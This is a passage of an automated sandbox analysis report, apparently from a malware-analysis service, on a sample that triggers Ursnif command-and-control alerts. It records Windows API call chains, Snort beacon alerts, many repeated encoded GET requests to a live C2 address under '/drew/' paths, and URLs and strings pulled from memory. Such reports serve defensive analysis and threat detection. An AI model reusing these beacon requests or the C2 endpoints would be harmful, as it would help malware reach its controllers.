            Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0511B2F7 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,5_2_0511B2F7
            Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_046DFD82 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,1_2_046DFD82

            Networking

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49746 -> 13.107.42.16:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49749 -> 13.107.42.16:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49749 -> 13.107.42.16:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49752 -> 194.76.226.200:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49752 -> 194.76.226.200:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49753 -> 194.76.226.200:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49753 -> 194.76.226.200:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49754 -> 194.76.226.200:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49754 -> 194.76.226.200:80
            Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.3:49755 -> 194.76.226.200:80
            Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.3:49755 -> 194.76.226.200:80
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 194.76.226.200 80Jump to behavior
            Source: global trafficHTTP traffic detected: GET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/6Ff.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/1sAtgPIBWWyXis_2FA/6GIdiDz41/F8DsJCsC5dAiiAp40xO_/2FPXx_2BF1qO46g3cTx/u5HuMo3uztxcUiL23t82FF/kkG2LxXPj08tg/H_2BJGnO/cP97dD1bDaB8ARH5ISgaEh8/3o1VSIlvAE/fAY7fRQsRaiXUwpok/xVsDrvhLU9b_/2FX5Wo3hVjQ/iMxJEhzERdYzAI/_2F44rqzPuWQ9p1F4Yhmb/gVtKSgiFTUu0Sz_2/FYShPBpN48b/U_2FavA.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/rBML1rj8uElJfatm/1XUPHcYedh6XQNG/RfzcEZujO75haDUuMp/MBSLanUya/vTUM6CjwjVB_2F1X1CjS/LV0aTkXgDCKfXT831Mw/iqWmLrFI0W1nnldmY0nQOm/5tR5VYVCXmkqO/7H59YBEK/Qx8N4StPVj2TG0lcxpPmDMJ/os_2F27yzy/K94E3NnjB3SOalL_2/B5phCQkfkmoU/vGkUfmn2z2D/bI_2FkP7bk5mb4/JjP_2B8QttRH66r/R92.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFdTh92Mttp/bKzDAO3E0N_2BxZ1ow/sTpBKLA2p/6BUrMhtfsbHTEuRLWcq7/jTbARM2BAFwOLbLtYBa/i_2BLCetjq8jqUWnEo5XCb/sLP1ktID7e6VC/G3BV6Vkb/N29_2BJlXZ2HReVfDXYWlEP/mt9DueL_2F/NgPtBNn5wZiJtUInd/fWiE7TY0/hCY.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQPJwabF/oYnH6redQswcAwtL/rDlMsMT_2FoiQ_2/BdNrJdcFdtJq9vsrPj/Pi_2B3_2B/dnsHU70OV9c4KUJyE_2F/0ip_2FIZ7Wqza0Ho2lN/KYodlnq6PG5KK9SBFWXHj5/viPS4jjPVWzpA/_2B2JOAM/KOBPUpSnsG9auoSxo_2BhjX/PvM1mRJl_2/FaBIYOp1w1wVY3Kqd/ZfinCIlH/i.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: unknownTCP traffic detected without corresponding DNS query: 194.76.226.200
            Source: rundll32.exe, 00000005.00000003.370229041.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.359952251.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/
            Source: rundll32.exe, 00000005.00000003.358439185.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/BFA
            Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/M
            Source: regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517659342.0000000003366000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509976865.0000000003365000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.500987131.0000000003362000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/GVxzdEn3rJxHPgJaE/ckcbKS4onbSJ/ZdlWFtgOHAM/pJGsS1vTtWNP8h/yNsXRCxcvAA6AXQ
            Source: rundll32.exe, 00000005.00000002.498298788.0000000003380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7o
            Source: rundll32.exe, 00000005.00000003.358348203.0000000003380000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7
            Source: rundll32.exe, 00000004.00000003.498230498.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.501303183.000000000334F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.370021803.000000000334C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.492598274.000000000334C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2
            Source: regsvr32.exe, 00000003.00000003.369970075.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499946286.000000000337C000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.455323184.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.369984660.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.377995492.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370876797.0000000003382000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.370736474.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.517881425.000000000337D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.499574749.000000000338F000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.509029101.0000000003392000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.518096997.0000000003392000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/drew/qj8KFpDyUAB/xQ_2FW_2FRVQUR/xo7UR19sTv1fTteFGwviu/H1QAugjBS9BAganl/OqUmHFd
            Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://194.76.226.200/mA
            Source: regsvr32.exe, 00000003.00000003.378321458.0000000003347000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/
            Source: rundll32.exe, 00000004.00000003.356735881.0000000003341000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.358273332.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/KsjuChW1FlW/h0G2ROzQWge1fX/1C6hndXvCTbmXNKw7e4fr/CwqIDwnvxPyopc2J/
            Source: regsvr32.exe, 00000003.00000003.363439458.000000000338B000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.363565997.000000000338C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://config.edge.skype.com/drew/tFFub3t73gQJ78QDkLr4/gr_2B_2BUJEeehBUVBY/ao0x4PCINZAsF2guaBcZS9/2c
            Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txt
            Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://constitution.org/usdeclar.txtC:
            Source: powershell.exe, 0000000E.00000003.519774884.00000185EC638000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.net
            Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://curlmyip.netJv1GYc8A8hCBIeVDfile://c:
            Source: loaddll32.exe, 00000001.00000003.419223881.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.424590800.0000000006248000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.416179066.00000000064A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.416181802.0000000006078000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001F.00000003.463004006.00000208030FC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000020.00000003.461557697.000002094CD9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
            Source: loaddll32.exe, 00000001.00000003.419462428.0000000004C98000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io/ip
            Source: global trafficHTTP traffic detected: GET /drew/XCtMkJNFgr1wO/rqNQ0HN4/ZyJyvokVrq1cpfT_2FjRvTK/tLuchRhy61/VY2_2BDejax1_2FZ_/2B4hja3XPXEF/qOMgeh9PvPf/N8zQpyy6Zc5e9b/4QO0R4yS5UCD1QFYshJGy/yTzTKH0fh7Ht9Zwy/6rUgxnlS7Il_2Fi/FA0gREqRHLz3XsH5AC/GH2iS6XmT/92F7y362W9gTjtIUfvoo/J_2Bt2_2BThMLoUrTFI/Ys7KyYaIys_2B6FXPvybrX/6Ff.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/2f3T6_2Fldpw_2BA6Engti/ap9anBYrptHHy/xCGyvO5i/wYPccsVOVAKMkuNvsUxMYE4/RkZB4YqLqe/XacN1M_2FaB24Ib2R/hVRxOozHufuZ/c6WQY_2FOGu/wQlIyAdYSezuQl/ojNT2IxdKraylKm035Q_2/FdvJBuYlSvhCsegR/oboSzu_2BtJ_2BW/XMLPOefEKMYQuO_2B_/2FNWtFwdl/dQERZJKq6wr_2FxRn8R5/MLhj_2Fz9ge97_2BBFz/rUr1Agrx59/b.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/m0QZKcj4ankL3W/8FVzGu6iQpcBkrTN5v3eZ/A6WzaqZBs9gogbdq/m8YEYG_2B_2FLSM/NM7eY2w3b1aL2aX8An/zJ6Vy7aKV/77q51XwDss_2Bne92xk6/rrRqhSV7rhVbP2hjU6R/_2B0H8cg3MM0IyieU8GPC9/gTwDi0Qx4J0HW/gyC_2FqL/iUkABk5euk2dlDO3ecBxilL/xQJUPbO4iF/9AhmuI174lSXWne_2/Fo5eEhaaDB/xKb9szQ5MHJ/1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/1sAtgPIBWWyXis_2FA/6GIdiDz41/F8DsJCsC5dAiiAp40xO_/2FPXx_2BF1qO46g3cTx/u5HuMo3uztxcUiL23t82FF/kkG2LxXPj08tg/H_2BJGnO/cP97dD1bDaB8ARH5ISgaEh8/3o1VSIlvAE/fAY7fRQsRaiXUwpok/xVsDrvhLU9b_/2FX5Wo3hVjQ/iMxJEhzERdYzAI/_2F44rqzPuWQ9p1F4Yhmb/gVtKSgiFTUu0Sz_2/FYShPBpN48b/U_2FavA.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/F2DN_2FU1e/fQ5u04QtqSS_2Fpez/wjKfLKebrhaF/MMToBjmjMxS/2NhI76XoCH_2F5/14TeSntbngCZZYLUNIrhm/x6MB8tXx2hU99kkL/VY0QQM3MDv5NCL1/6ydwr5AoPHPZyujorj/zsR7mWAsu/Dgwxr2J_2Bt6yrRwZsuj/G0YF7iDIM95RsJq2szP/8WMC9D3LjonMIPvdKF1kRz/NQS_2FA_2BozQ/hVadPzcD/tG9pjaS8y_2BWqM0wQM2d5M/W.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/SzHdMdWvg/8JrkfhvX1ImoPdiWmQP6/QNbELOUZkV6PJ_2F_2B/T_2FBOZzzLom_2BccXK2f_/2B4napL_2F34z/ZunofQOB/e8FUQk93KOWF2nr5L7lasmZ/NJz0CTr65M/vqC70qv5uFkSE3WWV/uzLbKezipUQb/EiDVCVAB9rI/YTJRJOijIzHReN/lOWZ3chpUTxk47un6IsE8/fGRw3zIlPFEXwpmw/KXHYTQF2fkI3XOU/3s8f8mWLipjSZC2MeH/eanpmASqD48wQWqOn/qyD.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/HzhM5fP5x43l7rSkYr8Y/jYk_2FxetzKCt9WlQ60/DHr3pyDc_2BukVZ7K3nBXi/MEA2Xn3fXlFfO/GgBWR09O/Z1DKEGLlegReZBua8Nnmy16/fhqdF_2Beg/hrDVYSGiYpSkF5kA7/KsGOnRLVKqBx/xsw07jdGhl6/opBuLWprNFNT7s/OVJpMrjpCjISLpLDnGaGt/ixsS7exYYQrwdM8F/_2FgW9_2FjtCahO/8Yp45dJrj8Sd2mVa6W/QapGna.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/q2MoEGVRNe15Nk60/LDrmU6_2F0GkU3d/_2F0Knrw_2BLeOfpGj/fbCS28O8a/HzEmaSZQ4r2vrrl3ds_2/FJYs8ohc9ZfX55MptAq/LUXti_2BtVHZBpG5bp31OD/nUDVndp9HwGDI/fdApFg3Y/hh5zxa6uVZWdnbZZ4Zw497E/am4BWYNw05/CiWFAq8EmF0WMEY2m/vQZOFYV25Mfi/UplJo0Tr14k/U65NpQlAx9OU47/ZEIy4h_2BMYYm16tA/UAd.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
            Source: global trafficHTTP traffic detected: GET /drew/S0hO4k1kNWmaIbAIKk6J/C6ltlnn67F9zU4319Wq/SHohWMCDfW7oiPhqwsiIKI/bmU8FVW7oRmBm/mR3BXgY_/2FBwUjw6HBJfko8dOlgJjVp/0AJ_2FHS_2/F6As3DqY8qnvNETrK/YeXgHXybA3MO/9wS_2FpxfKh/va60IJVV7f3myC/lkXy0Vd4C9gsuVelNEUUO/TZ36G6O4b_2Br5X5/Ty9Sl6i_2F9Ot_2/Fw5KU6KNbXI13KA_2B/fSlw9uxRZ/1GDQy2uvqr3Bg6MoNgQy/Xe_2F1.jlk HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: 194.76.226.200
